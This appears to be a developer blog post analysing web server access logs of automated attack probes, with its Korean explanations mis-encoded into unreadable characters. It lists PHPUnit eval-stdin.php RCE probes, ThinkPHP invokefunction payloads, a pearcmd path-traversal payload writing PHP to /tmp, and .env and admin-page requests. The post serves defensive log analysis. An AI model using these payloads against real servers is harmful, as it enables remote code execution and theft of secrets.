์ค๋์ ํดํน ์ ํฉ
"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 943 "backend not found" "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 944 "backend not found" "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php"
"GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 945 "backend not found" "/vendor/phpunit/src/Util/PHP/eval-stdin.php"
"GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 946 "backend not found" "/vendor/phpunit/Util/PHP/eval-stdin.php"
"GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 947 "backend not found" "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php"
"GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 948 "backend not found" "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 949 "backend not found" "/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 950 "backend not found" "/phpunit/phpunit/Util/PHP/eval-stdin.php"
"GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 951 "backend not found" "/phpunit/src/Util/PHP/eval-stdin.php"
"GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 952 "backend not found" "/phpunit/Util/PHP/eval-stdin.php"
"GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 953 "backend not found" "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 954 "backend not found" "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php"
"GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 955 "backend not found" "/lib/phpunit/src/Util/PHP/eval-stdin.php"
"GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 956 "backend not found" "/lib/phpunit/Util/PHP/eval-stdin.php"
"GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 957 "backend not found" "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 958 "backend not found" "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 959 "backend not found" "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 960 "backend not found" "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 961 "backend not found" "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 962 "backend not found" "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 963 "backend not found" "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 964 "backend not found" "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 965 "backend not found" "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 966 "backend not found" "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 967 "backend not found" "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 968 "backend not found" "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 969 "backend not found" "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 970 "backend not found" "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 971 "backend not found" "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 972 "backend not found" "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 973 "backend not found" "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 974 "backend not found" "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 975 "backend not found" "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 976 "backend not found" "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 977 "backend not found" "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 978 "backend not found" "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 979 "backend not found" "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 980 "backend not found" "/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello"
"GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 981 "backend not found" "/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello"
"GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php"
"GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 983 "backend not found" "/index.php?lang=../../../../../../../../tmp/index1"
"GET /.env HTTP/1.1" 404 19 "-" "Mozilla/5.0 (X11; Linux x86_64)" 984 "backend not found" "/.env"
"GET / HTTP/1.1" 404 19 "-" "Hello World" 985 "backend not found" "/
"GET /admin/login.asp HTTP/1.1" 404 19 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 986 "backend not found" "/admin/login.asp"
"GET /admin/login.asp HTTP/1.1" 404 19 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 987 "backend not found" "/admin/login.asp"
"GET /favicon.ico HTTP/1.1" 404 19 "http://119.205.236.169/admin/login.asp" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 988 "backend not found" "/favicon.ico"
์ค๋๋ ์ด๊น์์ด ์ฌ๋ฌ ๊ตญ๊ฐ์์ ๋ฌธ์ ์ด๊ณ ๋ค์ด์ฌ๋ ค๊ณ ์๋ํ๋ ๋ก๊ทธ๋ฅผ ๊ธฐ๋กํ๋ค. ์ดํ๋ฆฌ์ผ์ด์ ์์ค์์ ๋ฐ์ดํฐ ์์ค๋ฅผ ๋จ๊ธฐ๋ ์ผ์ ์ด์ ์ ํ์ด ์๋๋ผ ํ์๋ผ๊ณ ํ ์ ์๋ค. ๊ฐ๋ฐ์ ํ๋ฉด์ ์๋ชจ๋ฅด๋ ์ฃผ๋จน๊ตฌ๊ตฌ์์ผ๋ก ์ด๊ฑฐ ์ ๊ฑฐ ๋์ ํ๋ ์์ ๊ฐ๋ฐ๋ก ์์ํ๋ฉด ์ฒ์์๋ ๋น ๋ฅผ๊ฒ๊ฐ๋ ์๋๊ฐ ๊ท๋ชจ๊ฐ ์ปค์ง๋ฉด ์ ์ ๋๋์ง๋ ๊ฒ์ ํ์ธ ํ ์ ์๋ค. ์ด๋ ๋ฏ ๋ก๊ทธ๋ ์ ๋ง ์ค์ํ๋ค.
๋ก๊ทธ ๋ถ์
1. PHPUnit Exploits
PHPUnit์ PHP๋ก ์์ฑ๋ ๋จ์ ํ ์คํธ ๋๊ตฌ์ ๋๋ค. ํด์ปค๋ค์ ์ข ์ข PHPUnit์ด ์ค์น๋ ์๋ฒ์์ ํน์ ํ์ผ์ ํตํด ์๊ฒฉ ์ฝ๋ ์คํ์ ์๋ํฉ๋๋ค. (5์ ๋ ์ดํ์ php ๋ฒ์ ์์ ๋ฐ์ํ๋ ์ทจ์ฝ์ ์ด๋ฉฐ vender ์์ ํจํค์ง ํ์ผ๊ณผ ์ก๋คํ ํ์ผ๋ค์ด ๋ค์ด์์ด ์ฌ๊ธฐ๋ก ์ ๊ธดํด ๋ฐ์ดํฐ๋ฅผ ํ์ทจํ๋ ค๋ ์๋์ด๋ค.)
- ํ์ผ ํ์ ์๋: ๋ค์ํ ๊ฒฝ๋ก์์
eval-stdin.phpํ์ผ์ ์์ฒญํจ์ผ๋ก์จ ํด๋น ํ์ผ์ด ์กด์ฌํ๋์ง ํ์ธํ๋ ค๊ณ ํฉ๋๋ค. ์ด ํ์ผ์ ์๊ฒฉ ์ฝ๋ ์คํ ์ทจ์ฝ์ (CVE-2017-9841)๊ณผ ๊ด๋ จ์ด ์์ต๋๋ค./vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php /phpunit/phpunit/src/Util/PHP/eval-stdin.php /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
2. ThinkPHP Exploits
ThinkPHP๋ ์ค๊ตญ์์ ์ธ๊ธฐ ์๋ PHP ์น ํ๋ ์์ํฌ์ ๋๋ค. ํด์ปค๋ค์ ์ข ์ข ThinkPHP์ ์ทจ์ฝ์ ์ ์ด์ฉํด ์๊ฒฉ ์ฝ๋ ์คํ์ ์๋ํฉ๋๋ค.
- ๊ฒฝ๋ก ์กฐ์ ๋ฐ ์๊ฒฉ ์ฝ๋ ์คํ ์๋: ํน์ URL ํจํด์ ํตํด
call_user_func_arrayํจ์๋ฅผ ํธ์ถํ์ฌ ์๊ฒฉ ์ฝ๋ ์คํ์ ์๋ํฉ๋๋ค./index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
3. Directory Traversal ๋ฐ Local File Inclusion (LFI)
๋๋ ํ ๋ฆฌ ํธ๋๋ฒ์ค ๊ณต๊ฒฉ์ ํตํด ์๋ฒ์ ๋ฏผ๊ฐํ ํ์ผ์ ์ ๊ทผํ๋ ค๊ณ ์๋ํฉ๋๋ค.
- ๋๋ ํ ๋ฆฌ ํธ๋๋ฒ์ค ์๋: ์๋ฒ์ ๋ค๋ฅธ ๋๋ ํ ๋ฆฌ๋ก ์ ๊ทผํ์ฌ ํน์ ํ์ผ์ ์คํํ๋ ค๊ณ ์๋ํฉ๋๋ค.
/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5("hi"));?>+/tmp/index1.php /index.php?lang=../../../../../../../../tmp/index1
4. ํ๊ฒฝ ํ์ผ ์ ๊ทผ ์๋
.env ํ์ผ์ ํ๊ฒฝ ์ค์ ์ ๋ณด๋ฅผ ๋ด๊ณ ์์ผ๋ฉฐ, ๋
ธ์ถ๋ ๊ฒฝ์ฐ ์ฌ๊ฐํ ๋ณด์ ์ํ์ด ๋ ์ ์์ต๋๋ค.
- ํ๊ฒฝ ํ์ผ ์ ๊ทผ ์๋: ์๋ฒ์
.envํ์ผ์ ์ง์ ์์ฒญํ์ฌ ๋ฏผ๊ฐํ ์ ๋ณด๋ฅผ ์ป์ผ๋ ค๋ ์๋์ ๋๋ค./.env
5. ๊ธฐ๋ณธ ํ์ด์ง ๋ฐ ๊ด๋ฆฌ์ ๋ก๊ทธ์ธ ํ์ด์ง ์ ๊ทผ ์๋
๊ณต๊ฒฉ์๋ ์ข ์ข ๊ธฐ๋ณธ ํ์ด์ง ๋ฐ ๊ด๋ฆฌ์ ํ์ด์ง์ ์ ๊ทผํ์ฌ ์ธ์ฆ์ ์ฐํํ๊ฑฐ๋ ๊ธฐ๋ณธ ์๊ฒฉ ์ฆ๋ช ์ ์๋ํฉ๋๋ค.
- ๊ธฐ๋ณธ ํ์ด์ง ์ ๊ทผ ์๋: ์๋ฒ์ ๊ธฐ๋ณธ ํ์ด์ง์ ์ ๊ทผํ๋ ค๊ณ ์๋ํฉ๋๋ค.
/ HTTP/1.1" 404 19 "-" "Hello World- ๊ด๋ฆฌ์ ๋ก๊ทธ์ธ ํ์ด์ง ์ ๊ทผ ์๋: ๊ด๋ฆฌ์ ๋ก๊ทธ์ธ ํ์ด์ง์ ์ ๊ทผํ๋ ค๊ณ ์๋ํฉ๋๋ค.
/admin/login.asp- Favicon ์ ๊ทผ ์๋: ๊ด๋ฆฌ์ ํ์ด์ง์ favicon.ico ํ์ผ์ ์ ๊ทผํ์ฌ ๊ด๋ฆฌ์ ํ์ด์ง์ ์กด์ฌ ์ฌ๋ถ๋ฅผ ํ์ธํ๋ ค๊ณ ์๋ํฉ๋๋ค.
/favicon.ico
์ด์ ๊ฐ์ ๋ก๊ทธ๋ ์๋ฒ์ ๋ณด์ ์ทจ์ฝ์ ์ ํ์ํ๊ณ ์ ์ฉํ๋ ค๋ ํดํน ์๋๋ฅผ ๋ํ๋ ๋๋ค. ํด๋น ๋ก๊ทธ๋ฅผ ํตํด ํดํน ์๋๋ฅผ ์๋ณํ๊ณ ์ ์ ํ ๋ณด์ ์กฐ์น๋ฅผ ์ทจํ๋ ๊ฒ์ด ์ค์ํฉ๋๋ค.
'๐งโ๐ป Develop' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
| Github ๊ณ์ ์ ํ (0) | 2024.08.19 |
|---|---|
| Github Action Workflow Uses (0) | 2024.08.12 |
| indent : tab(ํญ, \t) or space(๊ณต๋ฐฑ, \s) (0) | 2024.05.08 |
| [rsyslog] ๋ค์ ๋ง๋ rsyslogd: action 'action-2-builtin:omfile' resumed (module 'builtin:omfile') (0) | 2024.04.17 |
| [rsyslog] imklog: cannot open kernel log, ERROR (Syntax error, this crontab file will be ignored), Operation not permitted. (0) | 2024.03.08 |
